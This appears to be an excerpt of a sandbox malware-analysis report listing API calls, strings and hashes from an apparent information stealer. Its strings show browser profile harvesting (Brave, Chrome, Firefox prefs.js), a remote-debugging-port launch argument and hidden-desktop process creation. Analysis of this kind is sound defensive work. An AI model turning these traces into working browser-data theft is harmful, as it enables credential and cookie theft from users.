                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: 3e51eb2a7bce31b8bbdd634a2ce22675ed4330a1049b3906e63248d153c771b6
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 2C113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D771EA90DF84
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                            • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                            Strings
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                            • Brave, xrefs: 0040C0E8
                                            • Google Chrome, xrefs: 0040C6F8
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                            • Preferences, xrefs: 0040C104
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                            • \Brave\Preferences, xrefs: 0040C1C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                            • API String ID: 3334442632-1869280968
                                            • Opcode ID: 941a693946549d8fdc195eacd1cfccc712cd3b7b2a62cbaad3fe546b67871098
                                            • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                            • Opcode Fuzzy Hash: 941a693946549d8fdc195eacd1cfccc712cd3b7b2a62cbaad3fe546b67871098
                                            • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                            APIs
                                            • wsprintfA.USER32 ref: 00413B1C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                            • API String ID: 1125553467-4052298153
                                            • Opcode ID: a364c7ef06ed2b08b9cc7aa448d679b8f4053c0569fc226c02cf7786d22a40f8
                                            • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                            • Opcode Fuzzy Hash: a364c7ef06ed2b08b9cc7aa448d679b8f4053c0569fc226c02cf7786d22a40f8
                                            • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 023FC12C
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 023FC19A
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 023FC1B0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FCB10
                                            • FindClose.KERNEL32(000000FF), ref: 023FCB22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction ID: 9f5a0961b6208f192ba0a79b82517ec98d0ca7786544c01c84ba8dcc89475b55
                                            • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction Fuzzy Hash: 095204729002189BCB64FB61DC95EEE733AAF54305F4045BEE64AA60D0EF345B88CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 00414B7C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                            • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s$%s\%s$%s\*$-SA
                                            • API String ID: 180737720-309722913
                                            • Opcode ID: 043cb273d76c1f4dfb9b648cbe12119fcc5c390ed9e5e5a39beb8ce38b0dc7be
                                            • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                            • Opcode Fuzzy Hash: 043cb273d76c1f4dfb9b648cbe12119fcc5c390ed9e5e5a39beb8ce38b0dc7be
                                            • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 02403D83
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02403D9A
                                            • lstrcat.KERNEL32(?,?), ref: 02403DEC
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 02403DFE
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 02403E14
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0240411E
                                            • FindClose.KERNEL32(000000FF), ref: 02404133
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 1125553467-0
                                            • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction ID: 81d7ce5bc46228e9ff5381ebeb91600213d06e2304b23b45de0945ece2e6afbd
                                            • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction Fuzzy Hash: 58A14F71A002189BDB34DFA4DD84FEE7779AF58300F44459AE60D96180EB759BC4CFA2
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                            • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                            • wsprintfA.USER32 ref: 004147F6
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                            • FindClose.KERNEL32(000000FF), ref: 004148F0
                                            • lstrcatA.KERNEL32(?,00A6DEE0,?,00000104), ref: 00414915
                                            • lstrcatA.KERNEL32(?,00A71730), ref: 00414928
                                            • lstrlenA.KERNEL32(?), ref: 00414935
                                            • lstrlenA.KERNEL32(?), ref: 00414946
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                            • String ID: %s\%s$%s\*
                                            • API String ID: 13328894-2848263008
                                            • Opcode ID: 8c6affe258670b47b452d03fd446b08653a83f15644d854d64d273e6cc8e8fce
                                            • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                            • Opcode Fuzzy Hash: 8c6affe258670b47b452d03fd446b08653a83f15644d854d64d273e6cc8e8fce
                                            • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 02404DE3
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02404DFA
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
                                            • FindClose.KERNEL32(000000FF), ref: 02405049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction ID: a10ac536bbb70969e195e2db413a0e80a5795799bfd360adfa0bb387ab765f19
                                            • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction Fuzzy Hash: 92615871900218ABCB24EBA0ED84FEA737DBF48701F44469EF64D96190EB759788CF91
                                            APIs
                                            • memset.MSVCRT ref: 00409E47
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            • wsprintfA.USER32 ref: 00409E7F
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                            • memset.MSVCRT ref: 00409EED
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                            • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                            • memset.MSVCRT ref: 00409F3D
                                            • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                            • memset.MSVCRT ref: 00409F9C
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                            • Sleep.KERNEL32(00001388), ref: 0040A013
                                            • CloseDesktop.USER32(00000000), ref: 0040A060
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: c979d09899498eba40eceedbf78c6cd84b2d1991ed22f1bef857ee40f5dca85b
                                            • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                            • Opcode Fuzzy Hash: c979d09899498eba40eceedbf78c6cd84b2d1991ed22f1bef857ee40f5dca85b
                                            • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                            APIs
                                            • wsprintfA.USER32 ref: 00414113
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                            • FindClose.KERNEL32(000000FF), ref: 004142D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 180737720-4073750446
                                            • Opcode ID: f2ea87638501b071d851062c862ecedcb8ad6f58deb18bcc975d83660161c401
                                            • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                            • Opcode Fuzzy Hash: f2ea87638501b071d851062c862ecedcb8ad6f58deb18bcc975d83660161c401
                                            • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02404A37
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02404A3E
                                            • wsprintfA.USER32 ref: 02404A5D
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02404A74
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02404AA2
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02404AB8
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02404B42
                                            • FindClose.KERNEL32(000000FF), ref: 02404B57
                                            • lstrcat.KERNEL32(?,006D6F24), ref: 02404B7C
                                            • lstrcat.KERNEL32(?,006D6C2C), ref: 02404B8F
                                            • lstrlen.KERNEL32(?), ref: 02404B9C
                                            • lstrlen.KERNEL32(?), ref: 02404BAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                            • String ID:
                                            • API String ID: 671575355-0
                                            • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction ID: 20184f7397a1279cdaaac3476183f3b07c96613f7ef82e27dc4c912faba8d31c
                                            • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction Fuzzy Hash: 49514471944218ABCB64EB70DD88FEA737DAF58300F40469AE64D96190EB749BC8CF91
                                            APIs
                                            • wsprintfA.USER32 ref: 0240437A
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02404391
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 024043BF
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 024043D5
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02404523
                                            • FindClose.KERNEL32(000000FF), ref: 02404538
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction ID: ecb3cc6ab1f43a947e8532b880f24eaa0771d1084a117d949479ce61d4be1e83
                                            • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction Fuzzy Hash: 885167B1904218ABCB24EB70DD84EEA737DBF54300F44469EB74996190EB759BC8CF91
                                            APIs
                                            • wsprintfA.USER32 ref: 0040EE3E
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                            • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\*.*
                                            • API String ID: 180737720-1013718255
                                            • Opcode ID: c969d09f5c4a69df72357afeb3f331d76aa74d77067d39fcd19690847085812c
                                            • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                            • Opcode Fuzzy Hash: c969d09f5c4a69df72357afeb3f331d76aa74d77067d39fcd19690847085812c
                                            • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                            • API String ID: 0-1562099544
                                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction ID: a7d40e7232fc064e6c1d3facd0be22f178e4d1e7131fff7302629a3b3421eb8f
                                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction Fuzzy Hash: 74E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                            • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID: 4@$\*.*
                                            • API String ID: 2325840235-1993203227
                                            • Opcode ID: 484dcf77841d37fdcca76b232d2818de80ce689e54c91586e87bbe45cb88a741
                                            • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                            • Opcode Fuzzy Hash: 484dcf77841d37fdcca76b232d2818de80ce689e54c91586e87bbe45cb88a741
                                            • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                            • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: prefs.js
                                            • API String ID: 3334442632-3783873740
                                            • Opcode ID: 072d83594ea58ce967a702448e93c4203c63cf1f112459f6011fb68e56ccc3d7
                                            • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
